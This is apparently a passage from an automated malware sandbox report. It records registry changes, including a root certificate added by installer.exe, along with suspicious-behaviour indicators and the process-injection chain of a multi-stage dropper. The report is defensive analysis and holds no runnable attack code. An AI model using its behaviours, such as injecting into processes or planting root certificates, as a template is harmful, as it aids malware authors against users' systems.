Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Key deleted \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_CLASSES\TYPELIB\{C9F3F6BB-3172-4CD8-9EB7-37C9BE601C87}\1.0\0\WIN32 OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\WOW6432Node\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\WOW6432Node\Interface\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33}\ProxyStubClsid32 OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\WOW6432Node\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\ = "FileSyncCustomStatesProvider Class" OneDriveSetup.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\WOW6432Node\CLSID\{7B37E4E2-C62F-4914-9620-8FB5062718CC}\VersionIndependentProgID\ = "FileSyncClient.FileSyncClient" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Interface\{466F31F7-9892-477E-B189-FA5C59DE3603}\TypeLib OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\en-US\\VoiceActivation_en-US.dat" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mcafee.com\Total = "713" MicrosoftEdgeCP.exe Key deleted \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Interface\{2387C6BD-9A36-41A2-88ED-FF731E529384} OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\TypeLib OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\CLSID\{917E8742-AA3B-7318-FA12-10485FB322A2} OneDriveSetup.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\yourhotfeed.com\ = "47" MicrosoftEdgeCP.exe Key deleted \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\WOW6432Node\Interface\{b5c25645-7426-433f-8a5f-42b7ff27a7b2} OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\WOW6432Node\Interface\{31508CC7-9BC7-494B-9D0F-7B1C7F144182} OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\WOW6432Node\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}\TypeLib\Version = "1.0" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\SyncEngineFileInfoProvider.SyncEngineFileInfoProvider.1\CLSID OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\WOW6432Node\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\LocalServer32 OneDriveSetup.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000b822be579a164de2ea861117ed51a0f7f89ccfa4ceb75e0e57734a25c51cecb0808c48fb41f91ef9f47ec83a84de1e3f2ee18be4c6ada68fed09 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData MicrosoftEdge.exe Key deleted \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_CLASSES\TYPELIB\{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}\1.0\FLAGS OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\WOW6432Node\Interface\{0d4e4444-cb20-4c2b-b8b2-94e5656ecae8}\ = "IGetSyncStatusCallback" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\TypeLib\{C9F3F6BB-3172-4CD8-9EB7-37C9BE601C87}\1.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.170.0822.0002" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\WOW6432Node\Interface\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33}\ = "ISyncEngineBandwidthLimiter" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms forfiles.exe -
Processes:
installer.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe -
Script User-Agent 5 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 13 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 65 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 178 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 474 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 601 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
cmd.exeWed15566afaea59e.exechrome.exeWed15edb855a49.exeWerFault.exeWerFault.exepid process 2288 cmd.exe 2288 cmd.exe 4392 Wed15566afaea59e.exe 4392 Wed15566afaea59e.exe 2288 chrome.exe 4300 Wed15edb855a49.exe 4300 Wed15edb855a49.exe 812 WerFault.exe 812 WerFault.exe 812 WerFault.exe 812 WerFault.exe 812 WerFault.exe 812 WerFault.exe 812 WerFault.exe 812 WerFault.exe 812 WerFault.exe 812 WerFault.exe 812 WerFault.exe 812 WerFault.exe 812 WerFault.exe 812 WerFault.exe 812 WerFault.exe 812 WerFault.exe 812 WerFault.exe 812 WerFault.exe 812 WerFault.exe 812 WerFault.exe 812 WerFault.exe 2288 chrome.exe 2288 chrome.exe 2124 2124 2124 2124 2124 2124 2124 2124 2124 2124 2124 2124 5484 WerFault.exe 5484 WerFault.exe 5484 WerFault.exe 5484 WerFault.exe 5484 WerFault.exe 5484 WerFault.exe 5484 WerFault.exe 5484 WerFault.exe 5484 WerFault.exe 5484 WerFault.exe 5484 WerFault.exe 5484 WerFault.exe 5484 WerFault.exe 5484 WerFault.exe 5484 WerFault.exe 5484 WerFault.exe 5484 WerFault.exe 5484 WerFault.exe 5484 WerFault.exe 5484 WerFault.exe 5484 WerFault.exe 5484 WerFault.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
foldershare.exepid process 2124 9456 foldershare.exe -
Suspicious behavior: MapViewOfSection 40 IoCs
Processes:
Wed15edb855a49.exewXZz5xY9daoSOnWFCSX4abIE.exeIX1zGxX9efDhwsZ12BGQ_ajS.tmpMicrosoftEdgeCP.exeaciavihMicrosoftEdgeCP.exeaciavihaciavihpid process 4300 Wed15edb855a49.exe 5032 wXZz5xY9daoSOnWFCSX4abIE.exe 8584 IX1zGxX9efDhwsZ12BGQ_ajS.tmp 11248 MicrosoftEdgeCP.exe 11248 MicrosoftEdgeCP.exe 11248 MicrosoftEdgeCP.exe 11248 MicrosoftEdgeCP.exe 11248 MicrosoftEdgeCP.exe 11248 MicrosoftEdgeCP.exe 11248 MicrosoftEdgeCP.exe 11248 MicrosoftEdgeCP.exe 9324 aciavih 11248 MicrosoftEdgeCP.exe 11248 MicrosoftEdgeCP.exe 11248 MicrosoftEdgeCP.exe 11248 MicrosoftEdgeCP.exe 11248 MicrosoftEdgeCP.exe 11248 MicrosoftEdgeCP.exe 11248 MicrosoftEdgeCP.exe 11248 MicrosoftEdgeCP.exe 6044 MicrosoftEdgeCP.exe 6044 MicrosoftEdgeCP.exe 7192 aciavih 6044 MicrosoftEdgeCP.exe 6044 MicrosoftEdgeCP.exe 6044 MicrosoftEdgeCP.exe 6044 MicrosoftEdgeCP.exe 6044 MicrosoftEdgeCP.exe 6044 MicrosoftEdgeCP.exe 6044 MicrosoftEdgeCP.exe 6044 MicrosoftEdgeCP.exe 6044 MicrosoftEdgeCP.exe 6044 MicrosoftEdgeCP.exe 2044 aciavih 6044 MicrosoftEdgeCP.exe 6044 MicrosoftEdgeCP.exe 6044 MicrosoftEdgeCP.exe 6044 MicrosoftEdgeCP.exe 6044 MicrosoftEdgeCP.exe 6044 MicrosoftEdgeCP.exe -
Suspicious behavior: SetClipboardViewer 2 IoCs
Processes:
6571754.scr1477080.scrpid process 6140 6571754.scr 7984 1477080.scr -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Wed154a69e494d5e99ca.execmd.exeWed1529d8198a8f0c1.exeWed15ac1df9305ded09.exeShadowVPNInstaller_t1.exeWerFault.exereg.exeWed15566afaea59e.exe1631231.scrtaskkill.exeConhost.exeWerFault.exedescription pid process Token: SeDebugPrivilege 980 Wed154a69e494d5e99ca.exe Token: SeDebugPrivilege 2288 cmd.exe Token: SeDebugPrivilege 2648 Wed1529d8198a8f0c1.exe Token: SeCreateTokenPrivilege 764 Wed15ac1df9305ded09.exe Token: SeAssignPrimaryTokenPrivilege 764 Wed15ac1df9305ded09.exe Token: SeLockMemoryPrivilege 764 Wed15ac1df9305ded09.exe Token: SeIncreaseQuotaPrivilege 764 Wed15ac1df9305ded09.exe Token: SeMachineAccountPrivilege 764 Wed15ac1df9305ded09.exe Token: SeTcbPrivilege 764 Wed15ac1df9305ded09.exe Token: SeSecurityPrivilege 764 Wed15ac1df9305ded09.exe Token: SeTakeOwnershipPrivilege 764 Wed15ac1df9305ded09.exe Token: SeLoadDriverPrivilege 764 Wed15ac1df9305ded09.exe Token: SeSystemProfilePrivilege 764 Wed15ac1df9305ded09.exe Token: SeSystemtimePrivilege 764 Wed15ac1df9305ded09.exe Token: SeProfSingleProcessPrivilege 764 Wed15ac1df9305ded09.exe Token: SeIncBasePriorityPrivilege 764 Wed15ac1df9305ded09.exe Token: SeCreatePagefilePrivilege 764 Wed15ac1df9305ded09.exe Token: SeCreatePermanentPrivilege 764 Wed15ac1df9305ded09.exe Token: SeBackupPrivilege 764 Wed15ac1df9305ded09.exe Token: SeRestorePrivilege 764 Wed15ac1df9305ded09.exe Token: SeShutdownPrivilege 764 Wed15ac1df9305ded09.exe Token: SeDebugPrivilege 764 Wed15ac1df9305ded09.exe Token: SeAuditPrivilege 764 Wed15ac1df9305ded09.exe Token: SeSystemEnvironmentPrivilege 764 Wed15ac1df9305ded09.exe Token: SeChangeNotifyPrivilege 764 Wed15ac1df9305ded09.exe Token: SeRemoteShutdownPrivilege 764 Wed15ac1df9305ded09.exe Token: SeUndockPrivilege 764 Wed15ac1df9305ded09.exe Token: SeSyncAgentPrivilege 764 Wed15ac1df9305ded09.exe Token: SeEnableDelegationPrivilege 764 Wed15ac1df9305ded09.exe Token: SeManageVolumePrivilege 764 Wed15ac1df9305ded09.exe Token: SeImpersonatePrivilege 764 Wed15ac1df9305ded09.exe Token: SeCreateGlobalPrivilege 764 Wed15ac1df9305ded09.exe Token: 31 764 Wed15ac1df9305ded09.exe Token: 32 764 Wed15ac1df9305ded09.exe Token: 33 764 Wed15ac1df9305ded09.exe Token: 34 764 Wed15ac1df9305ded09.exe Token: 35 764 Wed15ac1df9305ded09.exe Token: SeIncBasePriorityPrivilege 4496 ShadowVPNInstaller_t1.exe Token: SeDebugPrivilege 4496 ShadowVPNInstaller_t1.exe Token: SeLoadDriverPrivilege 4496 ShadowVPNInstaller_t1.exe Token: SeRestorePrivilege 812 WerFault.exe Token: SeBackupPrivilege 812 WerFault.exe Token: SeDebugPrivilege 3800 reg.exe Token: SeDebugPrivilege 812 WerFault.exe Token: SeDebugPrivilege 4392 Wed15566afaea59e.exe Token: SeShutdownPrivilege 2124 Token: SeCreatePagefilePrivilege 2124 Token: SeShutdownPrivilege 2124 Token: SeCreatePagefilePrivilege 2124 Token: SeDebugPrivilege 1812 1631231.scr Token: SeShutdownPrivilege 2124 Token: SeCreatePagefilePrivilege 2124 Token: SeShutdownPrivilege 2124 Token: SeCreatePagefilePrivilege 2124 Token: SeShutdownPrivilege 2124 Token: SeCreatePagefilePrivilege 2124 Token: SeDebugPrivilege 5368 taskkill.exe Token: SeDebugPrivilege 5620 Conhost.exe Token: SeDebugPrivilege 5484 WerFault.exe Token: SeShutdownPrivilege 2124 Token: SeCreatePagefilePrivilege 2124 Token: SeShutdownPrivilege 2124 Token: SeCreatePagefilePrivilege 2124 Token: SeShutdownPrivilege 2124 -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
setup_2.tmpultramediaburner.tmpinstaller.exechrome.exepid process 5504 setup_2.tmp 6332 ultramediaburner.tmp 3568 installer.exe 2124 2124 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 2124 2124 2124 2124 2124 2124 2124 2124 2124 2124 2124 2124 2124 2124 2124 2124 2124 2124 2124 2124 2124 2124 2124 2124 2124 -
Suspicious use of SendNotifyMessage 32 IoCs
Processes:
chrome.exepid process 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe 4388 chrome.exe -
Suspicious use of SetWindowsHookEx 11 IoCs
Processes:
forfiles.exeFC10.exe3wIhaEv7Ltp2XU8bgsQTib5q.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exepid process 2124 5728 forfiles.exe 4892 FC10.exe 4892 FC10.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 9492 MicrosoftEdge.exe 11248 MicrosoftEdgeCP.exe 11248 MicrosoftEdgeCP.exe 6100 MicrosoftEdge.exe 6044 MicrosoftEdgeCP.exe 6044 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.exesetup.execmd.exedescription pid process target process PID 1852 wrote to memory of 1116 1852 setup_x86_x64_install.exe setup_installer.exe PID 1852 wrote to memory of 1116 1852 setup_x86_x64_install.exe setup_installer.exe PID 1852 wrote to memory of 1116 1852 setup_x86_x64_install.exe setup_installer.exe PID 1116 wrote to memory of 1708 1116 setup_installer.exe setup_install.exe PID 1116 wrote to memory of 1708 1116 setup_installer.exe setup_install.exe PID 1116 wrote to memory of 1708 1116 setup_installer.exe setup_install.exe PID 1708 wrote to memory of 696 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 696 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 696 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 1596 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 1596 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 1596 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 2836 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 2836 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 2836 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 2636 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 2636 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 2636 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 2380 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 2380 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 2380 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 2592 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 2592 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 2592 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 2164 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 2164 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 2164 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 2088 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 2088 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 2088 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 3796 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 3796 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 3796 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 1068 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 1068 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 1068 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 748 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 748 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 748 1708 setup_install.exe cmd.exe PID 1596 wrote to memory of 1852 1596 cmd.exe Wed151f5e3fd2.exe PID 1596 wrote to memory of 1852 1596 cmd.exe Wed151f5e3fd2.exe PID 1596 wrote to memory of 1852 1596 cmd.exe Wed151f5e3fd2.exe PID 2636 wrote to memory of 3840 2636 cmd.exe Wed15228d911b9d5c.exe PID 2636 wrote to memory of 3840 2636 cmd.exe Wed15228d911b9d5c.exe PID 2636 wrote to memory of 3840 2636 cmd.exe Wed15228d911b9d5c.exe PID 2836 wrote to memory of 2648 2836 cmd.exe Wed1529d8198a8f0c1.exe PID 2836 wrote to memory of 2648 2836 cmd.exe Wed1529d8198a8f0c1.exe PID 2836 wrote to memory of 2648 2836 cmd.exe Wed1529d8198a8f0c1.exe PID 696 wrote to memory of 2288 696 cmd.exe powershell.exe PID 696 wrote to memory of 2288 696 cmd.exe powershell.exe PID 696 wrote to memory of 2288 696 cmd.exe powershell.exe PID 1708 wrote to memory of 1420 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 1420 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 1420 1708 setup_install.exe cmd.exe PID 2592 wrote to memory of 764 2592 cmd.exe Wed15ac1df9305ded09.exe PID 2592 wrote to memory of 764 2592 cmd.exe Wed15ac1df9305ded09.exe PID 2592 wrote to memory of 764 2592 cmd.exe Wed15ac1df9305ded09.exe PID 1708 wrote to memory of 3776 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 3776 1708 setup_install.exe cmd.exe PID 1708 wrote to memory of 3776 1708 setup_install.exe cmd.exe PID 2380 wrote to memory of 980 2380 setup.exe Wed154a69e494d5e99ca.exe PID 2380 wrote to memory of 980 2380 setup.exe Wed154a69e494d5e99ca.exe PID 2164 wrote to memory of 4136 2164 cmd.exe Wed150b6a68b74a9.exe PID 2164 wrote to memory of 4136 2164 cmd.exe Wed150b6a68b74a9.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
